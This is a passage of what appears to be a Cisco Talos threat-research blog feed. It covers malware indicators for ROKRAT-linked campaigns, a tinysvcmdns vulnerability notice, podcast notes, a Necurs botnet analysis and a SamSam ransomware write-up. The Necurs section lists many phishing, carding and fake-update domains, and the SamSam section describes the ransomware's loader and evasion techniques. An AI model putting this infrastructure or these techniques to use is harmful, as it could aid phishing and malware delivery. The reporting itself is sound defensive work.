                  - hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg
                  - hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg

                  Safe URLs:
                  - hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg
                  - hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4

                  "Evil New Year" Campaign:


                  Maldoc sha256: 281828d6f5bd377f91c6283c34896d0483b08ac2167d34e981fbea871893c919
                  Dropped #1: 95192de1f3239d5c0a7075627cf9845c91fd397796383185f61dde893989c08a
                  Dropped #2: 7ebc9a1fd93525fc42277efbccecf5a0470a0affbc4cf6c3934933c4c1959eb1
                  Dropped #3: 6c372f29615ce8ae2cdf257e9f2617870c74b321651e9219ea16847467f51c9f
                  Dropped #4: 19e4c45c0cd992564532b89a4dc1f35c769133167dc20e40b2a41fccb881277b
                  Dropped #5: 3a0fc4cc145eafe20129e9c53aac424e429597a58682605128b3656c3ab0a409
                  Dropped #6: 7d8008028488edd26e665a3d4f70576cc02c237fffe5b8493842def528d6a1d8

                  Unpacked #1: 7e810cb159fab5baccee7e72708d97433d92ef6d3ef7d8b6926c2df481ccac2f
                  Unpacked #1: 21b098d721ea88bf237c08cdb5c619aa435046d9143bd4a2c4ec463dcf275cbe
                  Unpacked #1: 761454dafba7e191587735c0dc5c6c8ab5b1fb87a0fa44bd046e8495a27850c7
                  Unpacked #1: 3d442c4457cf921b7a335c0d7276bea9472976dc31af94ea0e604e466596b4e8
                  Unpacked #1: 930fce7272ede29833abbfb5df4e32eee9f15443542434d7a8363f7a7b2d1f00
                  Unpacked #1: 4b20883386665bd205ac50f34f7b6293747fd720d602e2bb3c270837a21291b4
                  Unpacked #1: f080f019073654acbe6b7ab735d3fd21f8942352895890d7e8b27fa488887d08

                  Network:

                  - www[.]imuz[.]com/admin/data/bbs/review2/board/index.php
                  - www[.]imuz[.]com/admin/data/bbs/review2/board/123.php
                  - www[.]imuz[.]com/admin/data/bbs/review2/board/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)
                  - www[.]wildrush[.]co[.]kr/bbs/data/image/work/webproxy.php
                  - www[.]wildrush[.]co[.]kr/bbs/data/image/work/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)
                  - www[.]belasting-telefoon[.]nl//images/banners/temp/index.php
                  - www[.]belasting-telefoon[.]nl//images/banners/temp/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)
                  - www[.]kgls[.]or[.]kr/news2/news_dir/index.php
                  - www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg (where 02BC6B26 is randomly generated)

                  "Are You Happy?" Campaign:


                  Wiper sha256: 6332c97c76d2da7101ad05f501dc1188ac22ce29e91dab6d0c034c4a90b615bd

                  "FreeMilk" Campaign:


                  Office sha256: f1419cde4dd4e1785d6ec6d33afb413e938f6aece2e8d55cf6328a9d2ac3c2d0
                  HTA sha256: a585849d02c94e93022c5257b162f74c0cdf6144ad82dd7cf7ac700cbfedd84f
                  JS sha256: 1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c
                  PoohMilk sha256: 35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2
                  Freenki sha256: 7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df
                  Freenki 2016: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5

                  Network:
                  - hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]
                  - hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg
                  - hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg
                  - hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp
                  - hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php

                  "North Korean Human Rights" Campaign:


                  Maldoc sha256: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824
                  Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037
                  Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14
                  Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f
                  ROKRAT:: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e

                  "Evil New Year 2018" Campaign:


                  Maldoc sha256: f068196d2c492b49e4aae4312c140e9a6c8c61a33f61ea35d74f4a26ef263ead
                  PNG : bdd48dbed10f74f234ed38908756b5c3ae3c79d014ecf991e31b36d957d9c950
                  ROKRAT:: 3f7827bf26150ec26c61d8dbf43cdb8824e320298e7b362d79d7225ab3d655b1

                  Network:

                  - hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png


                  References


                  http://blog.talosintelligence.com/2017/02/korean-maldoc.html

                  http://blog.talosintelligence.com/2017/04/introducing-rokrat.html

                  http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

                  Vulnerability Spotlight: Tinysvcmdns Multi-label DNS DoS Vulnerability

                  $
                  0
                  0

                  Overview

                  Talos is disclosing a single NULL pointer dereference vulnerability in the tinysvcmdns library. Tinysvcmdns is a tiny MDNS responder implementation for publishing services. This is essentially a mini and embedded version of Avahi or Bonjour. 

                  Details

                  Discovered by Claudio Bozzato, Yves Younan, Lilith Wyatt, and Aleksandar Nikolic of Cisco Talos.


                  TALOS-2017-0486 / CVE-2017-12130 is a NULL pointer dereference vulnerability in the tinysvcmdns library. The vulnerability lies in the way that tinysvcmdns parses labels in DNS requests. This issue results in a NULL pointer, which when dereferenced results in a denial of service. An attacker could trigger this vulnerability by sending a specially crafted DNS query. Full details of the vulnerability are available here.

                  Coverage

                  The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rule: 44986

                  Beers with Talos EP20: Crypto, Vuln Disco, and the Spectre Meltdown

                  $
                  0
                  0


                  Beers with Talos (BWT) Podcast Episode 20 is now available.  Download this episode and subscribe to Beers with Talos:

                  If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

                  EP20 Show Notes: 

                  This is easily our best podcast of 2018 (so far). The crew discusses the recent spike in crypto-mania sweeping the globe and also goes in-depth on how vulnerability discovery plays a critical role in overall security. Plus, the crew all (shockingly) have different takes on Spectre/Meltdown and Craig decides to up the ante with the killer robots.

                  Timeline:

                  The Roundtable

                  01:20 - Matt - Discussing Cats - a BOGO on denigrating cultural icons
                  04:59 - Nigel - The Reds will be victorious and glorious, of course
                  07:11 - Craig - Probably not the firefighter/arsonist of the security world. Probably.
                  09:23 - Joel - Arctic bombs and picking a bone with Mother Nature
                  12:04 - MItch - Tales of the short lives of expensive presents

                  The Topics

                  15:10 - CRYPTO MANIA!!! HMB while I take out a second mortgage, also Ethereum CLIENT vulns
                  24:10 - Vuln disco - why it matters, discussion around recent Blender vulns
                  39:30 - Meltdown and Spectre - Breaking down the actual threat, risk/exposure, and mitigation
                  54:28 - Parting shots

                  The Links and Credits:

                  Ethereum Client Bugs blog post: http://blog.talosintelligence.com/2018/01/vulnerability-spotlight-multiple.html
                  Bitcoin Pizza Twitter: https://twitter.com/bitcoin_pizza?lang=en
                  Blender Vuln Spotlight blog post: http://blog.talosintelligence.com/2018/01/unpatched-blender-vulns.html
                  Meltdown/Spectre blog post: http://blog.talosintelligence.com/2018/01/meltdown-and-spectre.html
                  Phantom Tolley relevant XKCD: http://www.explainxkcd.com/wiki/index.php/1938:_Meltdown_and_Spectre
                  Critical Role (Geek and Sundry Twitch): https://geekandsundry.com/shows/critical-role/
                  Alexa Silver: https://www.youtube.com/watch?v=YvT_gqs5ETk
                  ==========

                  Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                  Hosted by Mitch Neff (@MitchNeff).

                  Find all episodes:
                  http://cs.co/talospodcast

                  Subscribe via iTunes (and leave a review!)
                  http://cs.co/talositunes

                  Check out the Talos Threat Research Blog:
                  http://cs.co/talosresearch

                  Subscribe to the Threat Source newsletter:
                  http://cs.co/talosupdate

                  Follow Talos on Twitter:
                  http://cs.co/talostwitter

                  Give us your feedback and suggestions for topics:
                  beerswithtalos@cisco.com

                  The Many Tentacles of the Necurs Botnet

                  $
                  0
                  0

                  This post was written by Jaeson Schultz.

                  Introduction

                  Over the past five years the Necurs botnet has established itself as the largest purveyor of spam worldwide. Necurs is responsible for emailing massive amounts of banking malware, ransomware, dating spam, pump-n-dump stock scams, work from home schemes, and even cryptocurrency wallet credential phishing. Necurs sends so much spam that at times Necurs' spam campaigns can make up more than 90% of the spam seen by Cisco Talos in one day.

                  To conduct a deeper analysis of Necurs, Talos extracted 32 distinct spam campaigns sent by Necurs between August 2017 and November 2017. The result was a collection of over 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses in over 200 countries and territories.


                  Necurs Recipients

                  From an email marketing and delivery perspective, Necurs doesn't appear to be too sophisticated. Necurs' recipient database includes email addresses that have been harvested online, commonly deployed role-based accounts, as well as email addresses that appear to have been auto-generated. These are among the worst, most unreliable sources for obtaining email addresses, and any legitimate email marketer wouldn't last a day mailing to addresses such as these. Of course, an illegitimate botnet such as Necurs has no such concerns. For many months the email addresses in Necurs database seemed to be largely static; Necurs hasn't actively added any new addresses for at least the past year, possibly two years or more. In November of 2017, Necurs stopped mailing to many of the autogenerated accounts.

                  At one of my personal domains, Necurs has been seen mailing to addresses such as 'equifax@' --an email address that was originally stolen from Equifax years before the 2017 breach. Necurs also often mails to 'thisisatestmessageatall@', another email address I generated and put into the wild, long ago. There are also variations on other legitimate addresses, for example 'aeson@', '20jaeson@', and 'eson@' which are all variations on my address 'jaeson@'. The number 20 was present at the beginning of many of Necurs recipients. Hex 20 corresponds with the space character and is used in percent-encoding, etc. This provides further indication of the harvested nature of these addresses.

                  Other addresses in Necurs' mailing list appear to have been auto-generated. For example 'EFgUYsxebG@', 'ZhyWaTmu@', and 'MTAyOvoYkx@' have never been aliases at my domain that I've ever used, and the only mail these accounts ever receive comes from Necurs.

                  Necurs email received at an auto-generated email address


                  From our set of Necurs' spam messages, Talos extracted only the user alias portion of the To: address. There are numerous email aliases, such as role-based addresses, that appear to be in Necurs' recipient DB across many different recipient domains. Strangely, the list also included some odd email aliases deployed at multiple domains such as 'unity_unity[0-9]@', 'petgord32truew@', 'iamjustsendingthisleter@', 'docs[0-9]@', and others.

                  Email alias and the number of domains in our data in which that alias was found

                  Interestingly, some of these same strange aliases can be found on Project Honeypot's list of the Top Dictionary Attacker Usernames, though it is unclear whether Necurs obtained their aliases from this list, or whether these aliases made Project Honeypot's list as a result of Necurs' spamming activity.

                  Project Honeypot's Top Dictionary Attacker Usernames

                  Necurs Sending IPs

                  Next, Talos extracted the sending IP addresses responsible for transmitting Necurs' spam emails, and we grouped the data according to geographical location. Rather than being uniformly distributed worldwide, a majority of Necurs' nodes were concentrated among just a few countries --India (25.7% of total spam), Vietnam (20.3% of total spam), and Iran (7.3% of total spam). More than half (51.3%) of the sending IP addresses in our data came from just these three countries. In contrast, other large industrialized nations were only responsible for tiny fraction of the spam. For example, the United States, was home to 6,314 (less than 1%) of Necurs sending IPs. The country of Russia was only attributed to 38 sending IP addresses out of a nearly 1.2 million total sender IPs!

                  Number of spam messages sent per country

                  Talos also analyzed the individual spam campaigns in order to determine how often the sending IP addresses were reused from campaign to campaign. We found very little infrastructure reuse. In fact, none of the sending IP addresses in our data were seen across all thirty-two of the campaigns we extracted. Only three sending IP addresses could be found across thirty of Necurs' spam campaigns. The vast, vast majority of sending IP addresses, 937,761 (78.6% of the total), were only ever seen in a single Necurs spam campaign! This means that Necurs botnet is large enough to conduct attacks over several months without substantial reuse of most sending nodes --an impressive feat.

                  Number of unique IP addresses vs. how many campaigns in which they appeared 


                  Necurs Spam Campaigns

                  Typically email campaigns from Necurs fall into one of two categories: high-volume weekday campaigns, or low volume continuous campaigns. Necurs has occasionally been seen sending high volume campaigns on weekends, but the vast majority of the time high volume campaigns are limited to the business week only. The mailing list database Necurs is using seems to be segmented, such that the high volume campaigns use one subset of email addresses from the DB, and the low volume campaigns use a different set of email addresses.

                  Pump-N-Dump Stock Spam

                  Below is an example of a pump-n-dump stock spam sent on April 12th, 2017 by Necurs touting the stock symbol QSMG, Quest Management Incorporated. On the following day the price of QSMG peaked at $2.33, probably netting the criminals a tidy gain on their initial investment. QSMG is currently worth less than $0.02.

                  A message touting the penny stock, QSMG

                  QSMG was at $2.33 on April 13. Currently it is worth less than $0.02

                  Dating Spam

                  Necurs also sends dating spam. Recent dating spam have arrived without any URLs in the body, except a mailto: link to an email address. Current dating campaigns have involved the free email provider rambler.ru, but other previous dating campaigns have taken advantage of similar free email services such as gmx.com. Necurs' dating campaigns have also been known to include HTML links to fast-fluxed domains, or sometimes compromised websites (Wordpress, etc.).

                  Necurs dating spam featuring an email address at rambler.ru

                  If you respond to one of these dating messages, you may be enrolled in a Russian dating website such as marmeladies.site. In this case, the criminals are making money by referring new users to these dating sites. Most likely they are being paid on an affiliate model.

                  Marmeladies is one of the dating sites to which victims who reply are directed

                  Ransomware

                  Of course one of Necurs' most well-known payloads is ransomware. Necurs has been one of the biggest distributors of the Locky ransomware. Locky also works on an affiliate model. Inside of each locky sample, in the metadata, is an affiliate ID, which is always the same (3) for Necurs mailings. Most of the time, very little investment is made in the design of the messages themselves, as in the following example.

                  A typical ransomware campaign from Necurs

                  Cryptocurrency Credential Phishing

                  The rise (and fall) in the value of digital currencies such as Bitcoin and Etherium has not escaped the attention of the Necurs criminals. They have been seen conducting attack campaigns using domains designed to look similar to legitimate wallet management websites. In the email below, note the extra word 'my' in the domain 'mymyetherwallet.com'.

                  This domain is registered to appear similar to the real Etherium wallet management site, myetherwallet.com
                  Recently, the Necurs attackers have drawn from previous stock pump-n-dump scams to come up with a relatively new tactic related to cryptocurrency. They had a spam campaign pumping Swisscoin (SIC).
                  A Necurs spam email encouraging recipients to buy Swisscoin (SIC)

                  Job Spam

                  Necurs was recently sending a low volume job spam campaign which includes links to freshly registered domains. For example, in the email below, sent October 30th 2017, we can see they are using a link to the domain, 'supercoins.top'. (The affiliate id in the URL is always the same)

                  An example of a low volume, job-related spam campaign from Necurs

                  Attribution

                  whois-agent@gmx.com

                  Checking the whois record for this domains we see the following registration details. Note the registrant email 'whois-agent@gmx.com'. This is an attempt by the threat actors to convince the casual observer that the domain is somehow registered through a third party whois privacy protection service. Email accounts @gmx.com are free to the public, and in this instance the attackers have simply generated the alias 'whois-agent' for their use in registering domains.


                  A review of the domains registered to 'whois-agent@gmx.com' yields 399 domains (from DT as of January 17, 2018). The list of domains registered to 'whois-agent@gmx.com' reads like a who's-who of criminal activity.

                  Among some of the more notable domains we can see obvious phishing domains:
                  amex-notification.com
                  amexcardmail.com
                  amexmailnotification.com
                  natwestonlinebanking.info
                  hsbc-sec.site
                  dropbox-ch.co
                  dropbox-fileshare.com
                  dropboxmailgate.com
                  paypa1.info
                  sage-uk.com
                  sagepay.info
                  Typo-squattish domains targeting cryptocoin-related sites:
                  myetlherwa11et.com
                  myetlherwalllet.com
                  rnyetherwa11et.com
                  blockchaifn.info
                  blockchaign.info
                  blockchainel.info
                  blockchaingr.info
                  blockchait.info
                  blockchalgn.info
                  blockchalne.info
                  blockchalner.info
                  blockchalng.info
                  blockchanel.info
                  blockchart.info
                  blockchatn.info
                  blockcheing.info
                  blockcheit.info
                  blockclmain.info
                  blockclnajn.info
                  bloclnchain.info
                  bloknchain.info
                  Fake Flash Player Update domains:
                  flash-ide-update.top
                  flash-ime-update.top
                  flash-one-eupdate.top
                  flash-one-update.info
                  flash-player-update.info
                  flash-update-player.info
                  Even domains intended to masquerade as government resources:
                  asic-gov-au.co
                  australia-gov-au.com
                  canadapost-office.info
                  govonfraud.info
                  A review of some of the domains in passive DNS gives us some other important clues. While most domains are only registered for the minimum of one year, the attackers have chosen to maintain the registration for a longer time on other domains such as 'pp24.ws'. That domain is home to an online marketplace for buying and selling stolen credit card numbers, stolen ssh account credentials and more.

                  'pp24.ws' is a website dedicated to buying and selling stolen credit card numbers

                  Passive DNS also reveals instances where the attackers have hosted domains belonging to different registrants on the same IP address. For example, when Talos analyzed the passive DNS records for one of the attacker's domains: 'setinfoconf.com' we found that this domain was hosted on a single IP address for a couple months in late 2016 before being parked. When we reviewed the other domains living on that same IP address we saw a bit of a pattern, and most importantly, some of these domains were NOT in the list of domains owned by 'whois-agent@gmx.com'.



                  whois-protect@hotmail.com

                  When we check the registration information for one of the above domains 'setinofis.pw', we find that there is a different registrant. This time the email address used to register the domain was 'whois-protect@hotmail.com'. Just as with the 'whois-agent@gmx.com' address, this is an attempt to appear to a casual observer that the domain is protected by whois privacy protection when in reality this email account appears to be under the direct control of the attackers themselves.



                  Reviewing the list of 1103 domains (Domain Tools as of January 17, 2018) associated with the 'whois-protect@hotmail.com' email address we see much of the same illicit activity we saw before.

                  More phishing domains:
                  amex-psk.org
                  amexsafetykey.org
                  applerecoveryprogram.com
                  applerecoveryprogram.top
                  barcalys-offers-online.com
                  bt-europe.com
                  btconnect.biz
                  btconnect.info
                  bttconnect.com
                  dhl4.com
                  docusign-australia.com
                  docusign-net.com
                  docusigner.org
                  dropbox-eu.com
                  dropboxa.com
                  dropboxes.org
                  dropboxsharing.com
                  dropboxsmarter.com
                  e-intuit.com
                  efaxplus.com
                  global-intuit.com
                  hsbcbank.top
                  inc-r.com
                  ing-update.info
                  kbc-bank.info
                  paupal.info
                  paypa.info
                  poypa1.info
                  quickbooks-intuit-uk.com
                  quickbooks-support.biz
                  quickbooksonlineaccounting.com
                  sage-uk.org
                  sageim.com
                  sages.biz
                  sagetop.com
                  security-hsbc.site
                  servicebying.com
                  telestrasystems.com
                  vodafonestore.net
                  wellsfargocertificate-637-9270.com
                  More domains targeting cryptocoin-related resources:
                  blockchfain.info
                  blokochain.info
                  myethelrwallet.com
                  myetherwallet.top
                  myetherwlallet.com
                  myethlerwallet.com
                  rnyetherwlallet.com
                  Similar themed, fake Flash Player updates:
                  flash-foe-update.win
                  flash-ire-update.win
                  flash-new-update.info
                  flash-old-update.top
                  flash-ome-update.win
                  flash-one-eupdatee.top
                  flash-one-eupdatte.top
                  flash-one-update.top
                  flash-one-update.win
                  flash-onenew-update.info
                  flash-ooe-update.win
                  flash-ore-update.win
                  flash-oue-update.top
                  flash-owe-update.win
                  flash-oxe-update.win
                  flash-oye-update.win
                  flash-playernewupdate.info
                  flash-toe-update.win
                  flash-woe-update.win
                  flash-yoe-update.win
                  flashnew-update.info
                  flashplayernew-update.info
                  We even see targeting of government resources, just as we did with the other registrant account:
                  afp-gov-au.com
                  asic-au-gov.com
                  asic-gov-au.com
                  asic-government-au.com
                  asic-mail-gov-au.com
                  asic-message-gov-au.com
                  asic-notification-gov.com
                  ato-gov-au.net
                  augovn.com
                  austgov.com
                  australiangovernement.com
                  australiangovernments.com
                  federalgovernmentaustralia.com
                  gov-invoices.info
                  goviau.co

                  tzyywz@qq.com

                  Checking the registration on some of the domains associated with 'whois-privacy@hotmail.com', we can find some domains in which there are other registrants and the whois-privacy@ address is simply an Administrative and Technical Contact. This reveals an additional registrant email address employed by the attackers, 'tzyywz@qq.com'.


                  According to Domain Tools (as of January 17, 2017), that qq.com email address is associated with over 2500 domains. Most of the domains belonging to this registrant email appeared to be domainer-style domains located at TLDs such as .bid and .top, but we also see a heavy dose of illegitimate looking domains in the set as well.

                  Some typical 'Domainer'-ish domains:
                  aapk.bid
                  aapo.bid
                  aapq.bid
                  aapu.bid
                  aapv.bid
                  aapw.bid
                  aapx.bid
                  jbanj.top
                  jcqth.top
                  jhtaq.top
                  jhugs.top
                  jian0.top
                  jian1.top
                  jian2.top
                  jian3.top

                  Illegitimate Domains:
                  amex-notification.com
                  amexaccountvalidate.com
                  amexcardcustomerservice.com
                  amexcardmail.com
                  amexcardpersonalsafetykey.com
                  amexcardpsk.com
                  amexcardsafetykey.com
                  amexcardservice.com
                  amexcardservicevalidate.com
                  amexcardsupport.com
                  amexcardsupportservice.com
                  amexcardsupportteam.com
                  amexcardverification.com
                  amexcardverified.com
                  amexcardverifier.com
                  amexcloudcervice.com
                  amexcustomersupport.com
                  amexmailnotification.com
                  amexotpcardcustomerservice.com
                  amexotpcardsupport.com
                  amexotpgenerate.com
                  amexotpgeneratesetup.com
                  amexotpsetup.com
                  amexotpsetupcustomerservice.com
                  amexotpsetupservice.com
                  amexpersonalsafekey.com
                  amexpersonalsafetykey.com
                  amexpersonalsafetykeyregistration.com
                  amexpersonalsafetykeysupport.com
                  amexpskcustomerservice.com
                  amexpskkey.com
                  amexpsksupport.com
                  amexsafetykeycustomerservice.com
                  amexverifier.com
                  amexverifierservice.com
                  docusign-australia.com
                  docusign-net.com
                  dropboxbusinessaccount.com
                  mail-asic-government-au.com
                  postbank-kundennummer43.com
                  postbank-kundennummerfinnaz.com
                  salesforceproaccount.com
                  verifybyamericanexpress.com
                  verifybyamexcards.com
                  yandex-login.com
                  yandex-user578185.com
                  yandex-user912.com
                  yandex-user952.com

                  More Domain Registrant Accounts Revealed

                  We can associate even more registrant email accounts with these same threat actors using similar techniques. While researching passive DNS for one of the domains we found previously, 'blokochain.info', we ran across something very interesting. That particular domain was hosted October 21, 2017 on the IP address 47.254.18.28 which belongs to Alibaba as part of their cloud hosting product. When we analyze all the other domains which have been hosted on that same IP we see many domains that belong to the registrant email addresses we already knew about, 'whois-agent@gmx.com' and 'whois-privacy@hotmail.com'. However we also see several domains associated with different registrants.



                  seoboss@seznam.cz

                  Looking at the list of domains found on this same Alibaba IP we find the domain 'paltruise.gdn'. This domain is registered to the registrant email address, 'seoboss@seznam.cz'. This registrant has registered 125 domains (Domain Tools as of January 17, 2018), many of which have been linked to malicious activities. According totheselinks, domains associated with this registrant email have been used as part of the Rig Exploit Kit infrastructure. The domain, 'paltruise.gdn', was hosted on the 47.90.202.68 Alibaba IP address on October 19, 2017 --only two days before the IP was used to host domains belonging to 'whois-protect@hotmail.com'.

                  galicole@mail.com

                  The domain 'indian-trk711.com' belongs to the registrant email address 'galicole@mail.com'. The 'indian-trk711.com' domain was hosted on the 47.254.18.28 IP on October 25th through October 30th, 2017 --also very close to the timeframe in which we saw the IP hosting the other malicious domains.

                  As of January 16, 2017, DomainTools attributes 918 domains to the registrant email address 'galicole@mail.com'. Among some of the domains associated with this address we find gems such as:
                  1royalbankrbcdirect.top
                  amex-onlinesecurity.top
                  buydumps.top
                  buydumpsonline.top
                  carder-cvv-shop.top
                  carder-cvv.name
                  carding-cvv-shop.top
                  carding-shop-cvv.top
                  carding-shop-track2.top
                  cardingcvv.top
                  cardingshoponline.top
                  cvv-carder.name
                  cvv-online-market.com
                  cvv-shop-carder.name
                  cvv-valid.info
                  cvv2-online-store.top
                  cvvcarder.name
                  cvvdumppluspin.top
                  cvvshopcarder.top
                  dumps-shop-valid.top
                  dumps-valid-shop.top
                  dumpsonlinestore.top
                  dumpsshopvalid.top
                  netflic-validatesystem.info
                  netflix-information.info
                  netflix-supportvalidate.info
                  netflix-verifysupport.info
                  netflix-veriificationbilling.info
                  netflixveriify.info
                  shop-dumps-valid.top
                  shop-online-cvv2.info
                  shop-online-dump.top
                  shopcardingonline.top
                  shopcardingtrack2.top
                  shopcvv2online.biz
                  shopcvvcarding.top
                  shopdumpsvalid.top
                  shoptrack2carding.top
                  store-cvv-online.biz
                  storecarderverified.biz
                  storecvv2.name
                  track2-shop-verified.biz
                  track2cardingshop.top
                  track2verifiedshop.top
                  valid-dumps.top
                  valid-market-cvv.top
                  valid-shop-cvv.top
                  valid-shop-dumps.top
                  validdumpsshop.top
                  verified-carder-store.com
                  verifiedcarderstore.biz
                  verifieddumpsshop.top
                  verifiedstorecarder.biz
                  verifiedtrack2shop.info


                  xlbs@tvchd.com

                  The domain 'daccat.at' is registered to 'xlbs@tvchd.com'. A Google search for this domain produces this link at Hybrid Analysis and indicates that this particular domain was contacted as part of a piece of malware. At Virus Total, 50/68 antivirus engines detect this particular sample as malicious.

                  jiamcho1955@dnsname.info

                  Searching Google for this registrant email address yields multiplelinks to malware that reaches out to domains owned by 'jiamcho1955@dnsname.info'. Virus Total corroborates this information showing 48 and 53 antivirus detections respectively.

                  One Instance to Host Them All

                  Reaching out through various contacts, Talos was able to confirm that, in fact, a single Alibaba cloud instance was controlling this same IP address for the entire time period from October 19, 2017 through October 30, 2017. Is this IP address some part of a criminal domain hosting service? Or is it that a single nefarious enterprise is behind all of these various registrant email accounts and their associated domains? Only the criminals involved in this enterprise can say for certain. Talos continues to monitor this situation with an eye towards further deciphering the business model deployed by these miscreants.

                  Conclusion

                  Now that Necurs is back from their regular holiday break they are attempting to fill our inboxes with junk mail and malware once again. On one hand, the size of the Necurs botnet, and its ability to send from different nodes in every campaign makes it difficult to defend against; Standard IP address blacklists are ineffective against such tactics. Fortunately for network defenders, the fact that Necurs does relatively little to curate their recipient database limits the damage they can do. There are only so many times the same recipients will fall for Necurs' same, repetitive tricks. We can expect that Necurs will continue to try variations on some of their tried and true attacks, and so user education against these threats remains paramount.


                  SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks

                  $
                  0
                  0

                  This post was written by Vitor Ventura

                  Introduction


                  Talos has been working in conjunction with Cisco IR Services on what we believe to be a new variant of the SamSam ransomware. This ransomware has been observed across multiple industries including Government, Healthcare and ICS. These attacks do not appear to be highly targeted, and appear to be more opportunistic in nature.

                  Given SamSam's victimology, its impacts are not just felt within the business world, they are also impacting people, especially if we consider the Healthcare sector. Non-urgent surgeries can always be rescheduled but if we take as an example patients where the medical history and former medical treatment are crucial the impact may be more severe. Furthermore, many critical life savings medical devices are now highly computerized. Ransomware can impact the operation of these devices making it very difficult for medical personnel to diagnose and treat patients leading to potentially life threatening situations. Equipment that might be needed in time-sensitive operations may be made unavailable due to the computer used to operate the equipment being unavailable.

                  The initial infection vector for these ongoing attacks is currently unknown and Talos is investigating this in order to identify it. The history of SamSam indicates that attackers may follow their previous modus operandi of exploiting a host and then laterally moving within their target environment to plant and later run the SamSam ransomware. Previously, we observed the adversaries attacking vulnerable JBoss hosts during a previous wave of SamSam attacks in 2016. Although the infection vector for the new variant is not yet confirmed, there is a possibility that compromised RDP/VNC servers have played a part in allowing the attackers to obtain an initial foothold.


                  There are no differences between the encryption mechanism used by this current SamSam variant compared to older versions. However, this time the adversaries have added some string obfuscation and improved the anti-analysis techniques used to make detection and analysis marginally more difficult.

                  This new variant is deployed using a loader which decrypts and executes an encrypted ransomware payload, this loader/payload model represents an improvement in the anti-forensic methods used by the malware. Samples containing this loader mechanism have been found as far back as October 2017. The wallet used by SamSam for this wave is shared by multiple infected victims as observed by monitoring the wallet at 1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR. We are also able to confirm the first payment into this wallet was received on 25th December 2017 - a nice holiday gift for this adversary. This can be confirmed by observing the first wallet transaction found on the Bitcoin blockchain here. There is a possibility that other Bitcoin wallets are also used but currently Talos is currently unaware of any others.

                  Similar to the previous variants, we believe the deployment of this SamSam variant to be highly manual, meaning an adversary must take manual action in order to execute the malware. The symmetric encryption keys are randomly generated for each file. The Tor onion service and the Bitcoin wallet address are hardcoded into the payload whilst the public key is stored in an external file with the extension .keyxml.

                  Additionally, code analysis didn't find any kind of automated mechanism for contacting the Tor Service address which means that the victim identification with the associated RSA private key must be done either manually or by another adversary tool.

                  Ransom note displayed by SamSam new variant

                  In most ransomware the attackers try to convince affected users that they have the ability to decrypt the data after the payment is made. SamSam is no different here and even displays a disclaimer as seen in the above screenshot, stating 'we don't want to damage our reliability' and 'we are honest'.

                  To this end SamSam adversaries offer free decryption of two files and an additional free key to decrypt one server. Once again SamSam actors show their ability to monitor and laterally move through the network by pointing out they will only provide a key if they believe the server is not an important piece of infrastructure. As with previous versions of SamSam they are advising that messaging the attackers can be performed via their site.

                  The "Runner"


                  The adversary has changed their deployment methodology and now they use a loader mechanism called "runner" to execute the payload. Upon execution, the loader will search for files with the extension .stubbin in its execution directory, this file contains the SamSam encrypted .NET Assembly payload. Upon reading the file, the loader decrypts the payload with the password supplied as the first argument and executes it, passing the remaining arguments.

                  The loader is a very simple .NET assembly with no obfuscation. Comparing both the Initialization Vector (IV) and the code structure it seems like it may have been derived from an example posted on the Codeproject.com website.

                  As you can seen in the images below, the IV used for the Rijndael encryption is the same in both implementations (posted code in hexadecimal, reversed code in decimal due to decompiler implementation).

                  Posted codeReversed code


                  At the code level looking specifically at the function 'Decrypt', it is obvious that the code structure in the Codeproject source and the latest SamSam runner sample is the same (comments from the posted code were removed).

                  Encryption routine source code comparison

                  The Payload


                  Previous versions of SamSam put some effort into the obfuscation of the malware code by encrypting strings with AES. The new version also obfuscates functions, class names and strings, including the list of targeted file extensions, the help file contents and environment variables, this time using DES encryption with a fixed hard-coded key and the IV.


                  Once again, the adversary has put more effort into preventing the forensic recovery of the malware sample itself rather than only relying on the obfuscation the running malware code, which allowed us to reverse engineer this sample.

                  As mentioned before, the password to decrypt the payload is passed as a parameter to the loader, which reduces the chances of obtaining the payload for analysis.

                  Previous versions of SamSam had an equivalent method for making payload access difficult by launching a thread that would wait 1 second before deleting itself from the hard disk.

                  The comparison of the main encryption routines between the old and the new samples indicates that this version of SamSam is similar enough to have high confidence that it belongs to the same malware family.

                  Encryption Routine Comparison

                  While previous SamSam versions used the API call DriveInfo.GetDrives() to obtain the list of available drives, this new version has the drive letters hardcoded. After checking that a drive is ready it starts a search for targeted files on the non-blacklisted folder paths.

